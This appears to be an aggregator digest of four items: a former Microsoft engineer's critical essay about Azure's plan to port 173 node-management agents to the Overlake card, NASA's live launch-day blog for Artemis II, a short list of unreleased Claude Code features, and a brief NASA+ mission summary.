As a returning employee, I skipped the New Employee Orientation and had my Global Security invite for 12 noon to pick up my badge, but my future manager asked if I could come in earlier, as the team had their monthly planning meeting that morning.
I, of course, agreed and arrived a few minutes before 10 am at the entrance of the Studio X building, not far from The Commons on the West Campus in Redmond. A man showed up in the lobby and opened the door for me. I followed him to a meeting room through a labyrinth of corridors.
The room was chock-full, with more people on a live conference call. The dev manager, the leads, the architects, the principal and senior engineers shared the space with what appeared to be new hires and junior personnel.
The screen projected a slide where I recognized a number of familiar acronyms, like COM, WMI, perf counters, VHDX, NTFS, ETW, and a dozen others, mixed with new Azure-related ones, in an imbroglio of boxes linked by arrows.
I sat quietly at the back while a man was walking the room through a big porting plan of their current stack to the Overlake accelerator. As I listened, it was not immediately clear what that series of boxes with Windows user-mode and kernel components had to do with that plan.
After a few minutes, I risked a question: Are you planning to port those Windows features to Overlake? The answer was yes, or at least they were looking into it. The dev manager showed some doubt, and the man replied that they could at least “ask a couple of junior devs to look into it.”
The room remained silent for an instant. I had seen the hardware specs for the SoC on the Overlake card in my previous tenure: the RAM capacity and the power budget, which was just a tiny fraction of the TDP you can expect from a regular server CPU.
The hardware folks I had spoken with told me they could only spare 4KB of dual-ported memory on the FPGA for my doorbell shared-memory communication protocol.
Everything was nimble, efficient, and power-savvy, and the team I had joined 10 minutes earlier was seriously considering porting half of Windows to that tiny, fanless, Linux-running chip the size of a fingernail.
That felt like Elon talking about colonizing Mars: just nuke the poles, then grow an atmosphere! Easier said than done, huh?
That entire 122-strong org was knee-deep in impossible ruminations involving porting Windows to Linux to support their existing VM management agents.
The man was a Principal Group Engineering Manager overseeing a chunk of the software running on each Azure node; his boss, a Partner Engineering Manager, was in the room with us, and they really contemplated porting Windows to Linux to support their current software.
At first, I questioned my understanding. Was that serious? The rest of the talk left no doubt: the plan was outlined, and the dev leads were tasked with contributing people to the effort. It was immediately clear to me that this plan would never succeed and that the org needed a lot of help.
That first hour in the new role left me with a mix of strange feelings, stupefaction, and incredulity.
The stack, I later learned, was hitting its scaling limits on a 400-watt Xeon at just a few dozen VMs per node, a far cry from the 1,024-VM limit I knew the hypervisor was capable of, and it was a noisy neighbor consuming so many resources that it caused jitter observable from the customer VMs.
There is no dimension in the universe where this stack would fit on a tiny ARM SoC and scale up by many factors. It was not going to happen.
I have seen a lot in my decades of industry (and Microsoft) experience, but I had never seen an organization so far from reality. My day-one problem was therefore not to ramp up on new technology, but rather to convince an entire org, up to my skip-skip-level, that they were on a death march.
Deep down, I knew it was going to be a fierce uphill battle. As you can imagine, it didn’t go well, as you’ll see later in this series.
I spent the next few days reading more about the plans, studying the current systems, and visiting old friends in Core OS, my alma mater. I was lost away from home in a bizarre territory where people made plans that didn’t make sense with the aplomb of a drunk LLM.
I notably spent more than 90 minutes chatting in person with the head of the Linux System Group, a solid scholar with a PhD from INRIA, who was among the folks who hired me on the kernel team years earlier.
His org is responsible for delivering Mariner Linux (now Azure Linux) and the trimmed-down distro running on the Overlake / Azure Boost card. He kindly answered all my questions, and I learned that they had identified 173 agents (one hundred seventy-three) as candidates for porting to Overlake.
I later researched this further and found that no one at Microsoft, not a single soul, could articulate why up to 173 agents were needed to manage an Azure node, what they all did, how they interacted with one another, what their feature set was, or even why they existed in the first place.
Azure sells VMs, networking, and storage at the core. Add observability and servicing, and you should be good. Everything else, SQL, K8s, AI workloads, and whatnot all build on VMs with xPU, networking, and storage, and the heavy lifting to make the magic happen is done by the good Core OS folks and the hypervisor.
How the Azure folks came up with 173 agents will probably remain a mystery, but it takes a serious amount of misunderstanding to get there, and this is also how disasters are built.
Now, fathom for a second that this pile of uncontrolled “stuff” is orchestrating the VMs running Anthropic’s Claude, what’s left of OpenAI’s APIs on Azure, SharePoint Online, the government clouds and other mission-critical infrastructure, and you’ll be close to understanding how a grain of sand in that fragile pileup can cause a global collapse, with serious National Security implications as well as potential business-ending consequences for Microsoft.
We are still far from the vaporized trillion in market cap, my letters to the CEO, to the Microsoft Board of Directors, and to the Cloud + AI EVP and their total silence, the quasi-loss of OpenAI, the breach of trust with the US government as publicly stated by the Secretary of Defense, the wasted engineering efforts, the Rust mandate, my stint on the OpenAI bare-metal team in Azure Core, the escort sessions from China and elsewhere, and the delayed features publicly implied as shipping since 2023, before the work even began.
If you’re running production workloads on Azure or relying on it for mission-critical systems, this story matters more than you think.
...
Read the original on isolveproblems.substack.com »
Live launch day updates for NASA’s Artemis II test flight will be published on this page. All times are Eastern.
The Orion spacecraft’s SAWs (solar array wings) have fully deployed, completing a key configuration step for the Artemis II mission. Flight controllers in Houston confirmed that all four wings unfolded as planned, locking into place and beginning to draw power.
Each solar array wing extends outward from the European Service Module, giving Orion, named Integrity, a wingspan of roughly 63 feet when fully deployed. Each wing has 15,000 solar cells to convert sunlight to electricity. The arrays can turn on two axes that allow them to rotate and track the Sun, maximizing power generation as the spacecraft changes attitude during its time in Earth orbit and on its outbound journey to the Moon.
The next major milestones are the PRM (perigee raise maneuver) and ARB (apogee raise burn) that will increase the lowest and highest points of the Orion spacecraft’s orbit and prepare the spacecraft for deep‑space operations.
Following the burns, NASA will hold a postlaunch news conference at 9 p.m. from Kennedy Space Center in Florida. Afterward, the Artemis II crew will begin preparations for Orion’s proximity operations demonstration. This demonstration will test the ability to manually maneuver Orion relative to another spacecraft, in this case the interim cryogenic propulsion stage after separation.
Coverage on NASA+ will soon conclude; however, 24/7 coverage will continue on NASA’s YouTube channel. Keep following the Artemis blog for live updates on key milestones throughout the mission.
Main engine cutoff of the SLS (Space Launch System) core stage is complete, and the core stage has successfully separated from the interim cryogenic propulsion stage and the Orion spacecraft. This marks the end of the first major propulsion phase of the Artemis II mission and the transition to upper‑stage operations.
The next major milestone is the deployment of the spacecraft’s SAWs (solar array wings) scheduled to begin approximately 18 minutes after launch. Once extended, the four SAWs will provide continuous electrical power to the spacecraft throughout its journey, supporting life‑support systems, avionics, communications, and onboard operations. Deployment is a critical step in configuring Orion for the remainder of its time in Earth orbit and for the outbound trip to the Moon.
The spacecraft adapter jettison fairings that enclose the service module and the launch abort system have separated from the Orion spacecraft. With the rocket and spacecraft now flying above the densest layers of Earth’s atmosphere, Orion no longer requires the protective structures that shielded it during the early, high‑dynamic‑pressure portion of launch.
The next major milestone is core stage separation and Interim Cryogenic Propulsion Stage ignition.
The SLS (Space Launch System) twin solid rocket boosters have separated. The boosters, each standing 177 feet tall and generating more than 3.6 million pounds of thrust at liftoff, provide most of the rocket’s power during the first two minutes of flight. Their separation reduces mass and allows the core stage to continue propelling the Orion spacecraft, named Integrity, toward orbit.
With the boosters now clear, the SLS core stage remains the primary source of thrust.
In about one minute, the spacecraft adapter jettison fairings that enclose Orion’s service module and the launch abort system will separate from the spacecraft.
6:35 p.m.
NASA’s Artemis II SLS (Space Launch System) rocket, with the Orion spacecraft atop carrying NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, lifted off from Kennedy Space Center’s Launch Complex 39B in Florida at 6:35 p.m. EDT to begin its journey to deep space.
The twin solid rocket boosters ignited first, delivering more than 75% of the thrust needed to lift the 5.75-million-pound rocket off the pad. Their combined power, along with the four RS-25 engines already at full thrust, generated an incredible 8.8 million pounds of force at liftoff. As the rocket rose, the umbilicals — which provided power, fuel, and data connections during prelaunch — disconnected and retracted into protective housings, ensuring the vehicle was free from ground systems and fully autonomous for flight.
The approximately 10-day Artemis II mission around the Moon is the first crewed flight under NASA’s Artemis campaign. It will help test the systems and hardware needed to continue sending astronauts on increasingly difficult missions to explore more of the Moon for scientific discovery, economic benefits, and to continue building toward the first crewed missions to Mars.
Below are the ascent milestones that will occur leading up to core stage separation. Times may vary by several seconds.
The Artemis II countdown has entered terminal count, and the ground launch sequencer has taken control, orchestrating a precise series of automated commands to prepare the SLS (Space Launch System) rocket and Orion spacecraft for liftoff at a T-0 time of 6:35 p.m. EDT.
The ground launch sequencer ensures that all systems – from propulsion to avionics – transition into flight mode. Key actions performed include pressurizing propellant tanks for optimal engine performance, activating flight software and switching control from ground to onboard systems, and performing final health checks across thousands of sensors to confirm readiness.
This automated sequence minimizes human intervention, reducing risk and ensuring synchronization across complex subsystems. For Artemis II, this moment marks the culmination of years of planning and testing, as the mission moves from ground operations to the threshold of launch.
See the list below of the terminal count milestones:
* T-4M — GLS is go for core stage auxiliary power unit (APU) start
Inside the terminal countdown, teams have a few options to hold the count if needed.
The launch team can hold at 6 minutes for the duration of the launch window, less the 6 minutes needed to launch, without having to recycle back to 10 minutes.
If teams need to stop the clock between T-6 minutes and T-1 minute, 30 seconds, they can hold for up to 3 minutes and resume the clock to launch. If they require more than 3 minutes of hold time, the countdown would recycle back to T-10.
If the clock stops after T-1 minute and 30 seconds, but before the automated launch sequencer takes over, then teams can recycle back to T-10 to try again, provided there is adequate launch window remaining.
After handover to the automated launch sequencer, any issue that would stop the countdown would lead to concluding the launch attempt for that day.
Artemis II Launch Director Charlie Blackwell-Thompson conducted one of the most important steps before liftoff: the “go/no-go” poll for the team to proceed with the final 10 minutes of the countdown known as terminal count.
A unanimous “go” across the board signals that Artemis II is fully prepared to proceed toward launch. This moment represents the culmination of years of planning and hours of meticulous pre-launch work, bringing the mission to the threshold of history.
The launch team has made the decision to extend the T-10 minute hold ahead of today’s launch to give engineers time to work through final preparations for liftoff. There is a two-hour window in which Artemis II could launch, and a new liftoff time will be set shortly.
NASA’s Artemis II closeout crew completed its final tasks and departed Launch Complex 39B at NASA’s Kennedy Space Center in Florida. After hours of meticulous work assisting the astronauts with suit-up, hatch closure, and critical spacecraft checks, the team exited the White Room and left the Orion spacecraft sealed and ready for flight.
This departure marks a major transition in launch operations: the spacecraft is now fully configured, and responsibility shifts to the launch control team for the final countdown. The closeout crew’s precision and expertise ensure that every connection, seal, and system is verified before they step away – making this moment a key milestone on the path to liftoff.
Engineers investigated a sensor on the launch abort system’s attitude control motor controller battery that showed a higher temperature than would be expected. It is believed to be an instrumentation issue and will not affect today’s launch.
The weather continues to cooperate and has now been upgraded to 90% go for launch.
Engineers have now resolved an issue with the hardware that communicates with the flight termination system that would have prevented the ground from sending a signal to destruct the rocket if it were to veer off course during ascent, to protect public safety. A confidence test was performed to ensure that the hardware is ready to support today’s launch.
Meanwhile, technicians have completed the launch abort system hatch closure – an essential step that ensures the Orion spacecraft is fully sealed and ready for flight. The hatch provides an additional protective barrier for the crew module, designed to safeguard astronauts during the Artemis II flight path and, if necessary, enable a rapid escape in the event of an emergency.
During this phase, the closeout team verifies hatch alignment, engages locking mechanisms, and confirms pressure integrity. These checks guarantee that the launch abort system hatch can perform its function flawlessly, maintaining structural integrity under extreme launch conditions. With the hatch secured, Orion enters its final configuration for liftoff, marking one of the last major milestones before fueling and launch.
Although the countdown to today’s Artemis II launch is continuing to progress, the Eastern Range has identified an issue that they are currently working to resolve related to their communication with the flight termination system. The flight termination system is a safety system that allows engineers on the ground to send a signal to destruct the rocket if it were to veer off course during ascent, to protect public safety. Without assurance that this system would work if needed, today’s launch would be no-go. However, engineers have devised a way to verify the system and are currently preparing to test this solution.
Technicians began installing the crew module hatch service panel on the Orion spacecraft, an important step in final launch preparations. This panel protects key connections and ensures the hatch area is secure for flight.
As part of current closeout activities, teams are confirming all systems around the hatch are properly sealed and ready for the mission.
With the hatch area secured, teams will continue final checks and countdown operations at Launch Pad 39B at NASA’s Kennedy Space Center in Florida, bringing us closer to sending astronauts on a historic journey around the Moon.
NASA engineers have conducted counterbalance mechanism operations and are now performing hatch seal pressure decay checks inside the White Room at Launch Complex 39B. These steps ensure Orion’s hatch maintains proper pressure integrity and that the counterbalance system functions as designed for launch conditions.
The counterbalance mechanism is a precision-engineered assembly that offsets the weight of the crew module hatch, allowing technicians to open and close it smoothly without introducing stress on the hinge or seal. This system uses calibrated springs and dampers to maintain alignment and prevent sudden movements, which is essential for preserving the hatch’s airtight seal. During this phase, technicians verify the mechanism’s load distribution and confirm that its locking features engage correctly under simulated launch loads.
Following these adjustments, the team performs seal pressurization decay checks – monitoring pressure loss over time to confirm the hatch’s integrity. These checks are vital for astronaut safety, ensuring the cabin remains secure in all mission phases.
NASA’s Artemis II closeout crew is now completing one of the most critical steps before launch: preparing and closing the crew module hatch to the Orion spacecraft. Inside the White Room at Launch Complex 39B, the closeout crew is working meticulously to inspect seals, secure fasteners, and verify that the hatch is airtight.
This process ensures Orion is fully pressurized and ready for flight. Once the hatch is closed and locked, the astronauts are officially sealed inside their spacecraft, marking a major milestone on the path to liftoff.
NASA’s Artemis II crew members are boarding the agency’s Orion spacecraft to begin communication checks to confirm voice links with mission control and onboard systems.
Before entering the spacecraft that will be their home on the approximately 10-day journey around the Moon and back, all four crewmates signed the inside of the White Room, an area at the end of the crew access arm that provides access to the spacecraft. The term “White Room” dates to NASA’s Gemini program, and to honor this human spaceflight tradition, the room remains white today.
The Artemis II closeout crew is now working to help the astronauts enter the Orion spacecraft and make final preparations for their nearly 700,000-mile trip to the Moon and back. As part of the process, the closeout crew is helping the astronauts don their Orion Crew Survival System helmets and gloves, as well as board Orion and get buckled in.
A short time from now, the closeout crew will close the crew module and exterior launch abort system hatches. Even a single strand of hair inside the hatch doors could potentially pose issues with closing either hatch, so the process is carefully done and takes up to four hours. Each step in the closeout process ensures airtight seals and communication readiness for the mission ahead.
Following communication checks, the team performed suit leak checks – a vital safety procedure ensuring each pressure suit maintains integrity in case of cabin depressurization. These operations are essential for crew readiness and mission assurance, marking one of the final phases before hatch closure and launch preparations.
With assistance from the closeout crew, the Artemis II crew are carefully donning their helmets and gloves – finalizing suit integrity checks before boarding the Orion spacecraft.
This step is more than ceremonial; it ensures airtight seals and communication readiness for the mission ahead. The closeout crew plays a vital role, guiding the astronauts through these procedures and confirming every connection is secure before hatch closure.
Stay tuned as we continue to follow the Artemis II team through each countdown milestone on their path to liftoff.
The Artemis II crew, NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, arrived at Launch Complex 39B at the agency’s Kennedy Space Center in Florida, where the SLS (Space Launch System) rocket with the Orion spacecraft atop stands ready for launch. The opening of today’s launch window is slated for just over 4 hours from now, at 6:24 p.m. EDT.
In the next few minutes, the crew will take the elevator up the pad’s fixed service structure and walk down the climate-controlled crew access arm to the White Room, their final stop before climbing aboard their Orion spacecraft. In this clean, controlled environment at the end of the crew access arm, the closeout crew will assist the astronauts with hatch operations and verify that all safety systems are ready for launch.
Since the late 1960s, pads A and B at Kennedy’s Launch Complex 39 have supported America’s major space programs, with Pad A used most frequently for launches under the Space Shuttle Program. After the retirement of the shuttle in 2011, Pad A helped usher in a new era of human spaceflight as the launch pad for the agency’s Commercial Crew Program, which returned human spaceflight capability to the United States. Pad B saw the launch of NASA’s Artemis I mission in November 2022 and will continue to be the primary launch pad for America’s efforts to return humans to the Moon.
Just moments ago, NASA’s Artemis II flight crew began the walk that every NASA astronaut has made since Apollo 7 in 1968, heading to the elevator and down through the double doors below the Neil A. Armstrong Building’s Astronaut Crew Quarters at NASA’s Kennedy Space Center in Florida.
Before they left the suit-up room, the crew completed one last piece of unfinished business — a card game. A long-held spaceflight tradition, NASA crews play cards before leaving the crew quarters ahead of launch until the commander, in this instance NASA astronaut Reid Wiseman, loses. It is hoped that by losing, the commander burns off all his or her bad luck, thereby clearing the mission for only good luck.
NASA’s Artemis II is the first crewed mission of the Artemis program and will carry Wiseman and fellow NASA astronauts Victor Glover and Christina Koch, as well as CSA (Canadian Space Agency) astronaut Jeremy Hansen on an approximately 10-day mission around the Moon and back to Earth.
The first crewed deep-space flight in over 50 years, Artemis II is expected to send the crew farther from Earth than any previous human mission, potentially breaking the record of about 248,655 miles (400,171 km) from Earth set by Apollo 13 during its lunar free-return trajectory. This milestone will occur during the lunar flyby phase, when the crew travels on a free-return trajectory around the Moon, which allows the spacecraft to loop around the Moon and return to Earth without entering lunar orbit.
During the test flight, NASA will test life-support systems and critical operations in deep space, paving the way for future lunar landings and Mars exploration.
Having received goodbyes and well wishes from their families and friends, the crew embarks on the 20-minute journey to Kennedy’s Launch Pad 39B and their awaiting spacecraft.
NASA’s pad rescue and closeout crew teams have arrived at Launch Complex 39B at the agency’s Kennedy Space Center in Florida to ensure safety and readiness during the critical fueling operations. These specialized teams play a vital role in protecting personnel and hardware throughout the countdown.
The pad rescue team will be positioned to respond immediately in the unlikely event of an emergency, ensuring safe evacuation procedures for pad personnel. The rescue team is equipped with advanced gear and trained for rapid crew extraction, fire suppression, and hazard mitigation. Their presence ensures astronaut safety remains the top priority, providing an all-important layer of protection as fueling operations and system checks continue.
The closeout crew is responsible for closing the Orion crew module and launch abort system hatches, securing access points, verifying pad configurations, and maintaining the integrity of the launch area during propellant loading and system checks. Their work is critical for guaranteeing a secure environment for the astronauts before the launch pad is cleared for liftoff operations.
These teams are essential for mitigating risk and supporting the complex choreography of Artemis II’s prelaunch activities. With both teams in place, Artemis II remains on track for its historic mission to send astronauts around the Moon.
NASA astronauts Reid Wiseman, commander; Victor Glover, pilot; and Christina Koch, mission specialist; along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, mission specialist, are suiting up inside the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agency’s Kennedy Space Center in Florida.
A team of suit technicians helps the crew put on their Orion Crew Survival System suits, each tailored for mobility and comfort while ensuring maximum safety during the dynamic phases of flight. The bright orange spacesuits are designed to protect the crew on their journey and feature many improvements, from head to toe, over the suits worn on the space shuttle. NASA reengineered many elements to improve safety and range of motion for Artemis astronauts, and instead of the small, medium, and large sizes of the shuttle era, the suits are custom fit for each crew member.
The outer layer is fire-resistant, and a stronger zipper allows astronauts to quickly put the suit on. Improved thermal management will help keep them cool and dry. A lighter, stronger helmet improves comfort and communication, and the gloves are more durable and touch-screen compatible. Better-fitting boots also provide protection in the case of fire and help an astronaut move more swiftly.
The suits’ design and engineering enhancements provide an additional layer of protection for astronauts and ensure they return home safely from deep space missions.
During suit-up, teams will check for leaks and ensure that all connecting life support systems, including air and power, are operating nominally ahead of the crew’s ride to NASA Kennedy’s Launch Complex 39B.
With NASA teams now maintaining the liquid oxygen levels in the interim cryogenic propulsion stage, all cryogenic stages of the SLS (Space Launch System) rocket have transitioned to replenish mode during the Artemis II launch countdown. This includes the core stage and the SLS upper stage, ensuring both liquid hydrogen and liquid oxygen tanks remain at flight-ready levels.
Replenish mode is essential for maintaining stable propellant quantities and pressure as super-cold fuels naturally boil off over time. Continuous adjustments keep the rocket fully fueled and ready for ignition, supporting the RS-25 engines on the core stage and the RL10 engine on the SLS upper stage for their essential roles in launch and translunar injection.
These milestones coincide with the Artemis II countdown entering a planned 1-hour and 10-minute built-in hold. This scheduled pause allows teams to complete crucial system checks, verify launch readiness, and address any last-minute adjustments before proceeding toward crew ingress and final fueling operations.
During this hold, engineers review data from cryogenic loading, propulsion systems, and communications to ensure all parameters meet strict safety and performance criteria. The hold also provides flexibility for resolving minor issues without impacting the overall launch timeline.
Once the hold concludes, the countdown will resume with preparations for astronaut arrival at Launch Pad 39B at NASA’s Kennedy Space Center in Florida.
NASA’s Artemis II astronauts received a final weather briefing inside the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agency’s Kennedy Space Center in Florida, as part of prelaunch preparations.
This weather update provides astronauts and mission teams with the latest conditions at NASA Kennedy’s Launch Pad 39B, the surrounding recovery zones, and potential abort sites along Artemis II’s flight path. Accurate weather forecasting is essential for protecting crew and hardware, as even minor changes can impact countdown decisions and flight dynamics.
NASA astronauts Reid Wiseman, commander; Victor Glover, pilot; and Christina Koch, mission specialist; along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, mission specialist, were briefed on wind speeds, precipitation, lightning risk, and sea states for splashdown contingencies, ensuring all safety criteria are met before proceeding with launch operations.
Weather officials with NASA and the U.S. Space Force’s Space Launch Delta 45 are tracking 80% favorable conditions during the launch window, with the primary concerns being the cumulus cloud rule, the flight through precipitation rule, and ground winds.
With the weather briefing complete, the crew and ground teams remain aligned and ready to continue toward liftoff, keeping Artemis II on track for its historic mission to send astronauts around the Moon.
NASA teams also have begun the liquid oxygen (LOX) topping process for the interim cryogenic propulsion stage, or SLS (Space Launch System) rocket upper stage, during the Artemis II launch countdown. This step follows the fast fill phase and ensures the liquid oxygen tank reaches full capacity with super-cold oxidizer.
Live coverage of Artemis II tanking operations continues on NASA’s YouTube channel. NASA’s full launch coverage begins at 1 p.m. EDT on NASA+, Amazon Prime, and YouTube. You can continue to follow the Artemis blog from launch to splashdown for mission updates.
Liquid oxygen (LOX) fast fill is now complete for the SLS (Space Launch System) upper stage, marking another major milestone in tanking operations. Teams have confirmed the upper stage is in good shape and are proceeding with the LOX vent and relief test. This step helps verify proper pressure regulation and ensures the system is ready to transition into topping and, later, replenish operations.
NASA teams are now maintaining the liquid oxygen levels in the SLS (Space Launch System) rocket core stage through replenish mode. This phase follows the completion of liquid oxygen fast fill and topping, ensuring the oxidizer remains at flight-ready levels throughout the final countdown.
NASA teams are in fast fill of liquid oxygen (LOX) into the interim cryogenic propulsion stage as part of the Artemis II launch countdown. This phase rapidly loads the oxidizer after chilldown is complete, bringing the SLS (Space Launch System) rocket upper stage closer to full readiness for its role in sending the Orion spacecraft into a high Earth orbit ahead of a proximity operations demonstration test and Orion’s translunar injection burn.
NASA teams have transitioned the interim cryogenic propulsion stage liquid hydrogen tank to replenish mode during the Artemis II countdown. This phase follows the successful topping process and ensures the tank remains at flight-ready levels all the way to launch.
NASA teams have begun the topping phase for the interim cryogenic propulsion stage liquid hydrogen (LH2) tank. This critical step occurs after successful chilldown and vent-and-relief checks, ensuring the tank reaches full capacity with super-cold liquid hydrogen.
Replenish is the final step in the fueling process, designed to maintain the correct LH2 levels as the super-cold propellant naturally boils off over time. This continuous, low-rate flow keeps the tanks topped off and thermally stable, ensuring the rocket remains fully fueled and ready for liftoff.
From chilldown to replenish, every phase of fueling is carefully managed to protect hardware and guarantee mission success. With replenish underway, Artemis II is in its final stretch toward launch and humanity’s next giant leap.
Topping is the process of adding small amounts of LH2 to the tanks after fast fill is complete, ensuring they remain at full capacity as the super-cold propellant naturally boils off. This step is critical for maintaining the precise levels needed for launch while keeping the system thermally stable.
The Artemis II launch team transitioned to the fast fill of liquid hydrogen (LH2) for the interim cryogenic propulsion stage, or SLS (Space Launch System) rocket upper stage.
After completing the chilldown phase, this step rapidly loads super-cold LH2 into the SLS upper stage tanks, ensuring the upper stage is fueled and ready to perform its fundamental role of raising the Orion spacecraft into a high Earth orbit ahead of a proximity operations demonstration test and Orion’s translunar injection burn.
Fast fill accelerates the fueling process while maintaining safety, marking another major milestone in the countdown as Artemis II moves closer to liftoff.
The Artemis II launch team has begun the liquid hydrogen chilldown for the interim cryogenic propulsion stage, or SLS (Space Launch System) rocket upper stage.
This process gradually cools the interim cryogenic propulsion stage fuel lines and components to cryogenic temperatures using super-cold liquid hydrogen. The chilldown step is essential to prevent thermal shock and ensure the stage is properly conditioned for full propellant loading. By stabilizing the system at these extreme temperatures, engineers guarantee safe and efficient fueling for the upper stage that will help position Orion into high Earth orbit for its journey toward the Moon.
NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, have officially begun their launch day with a scheduled wake-up call at 9:25 a.m., marking the start of their final preparations for the historic Artemis II mission around the Moon.
The Artemis II launch team transitioned to the fast fill of liquid hydrogen (LH2) into the SLS (Space Launch System) rocket core stage.
...
Read the original on www.nasa.gov »
Stuff that’s in the code but not shipped yet. Feature-flagged, env-gated, or just commented out.
A virtual pet that lives in your terminal. Species and rarity are derived from your account ID.
Persistent mode with memory consolidation between sessions and autonomous background actions.
Long planning sessions on Opus-class models, up to 30-minute execution windows.
Control Claude Code from your phone or a browser. Full remote session with permission approvals.
Run sessions in the background with --bg or tmux.
Sessions talk to each other over Unix domain sockets.
Between sessions, the AI reviews what happened and organizes what it learned.
...
Read the original on ccunpacked.dev »
Artemis II is NASA’s first crewed mission under the Artemis program and will launch from the agency’s Kennedy Space Center in Florida. It will send NASA astronauts Reid Wiseman, Victor Glover, Christina Koch, and CSA (Canadian Space Agency) astronaut Jeremy Hansen on an approximately 10-day journey around the Moon. Among objectives, the agency will test the Orion spacecraft’s life support systems for the first time with people and lay the groundwork for future crewed Artemis missions.
...
Read the original on plus.nasa.gov »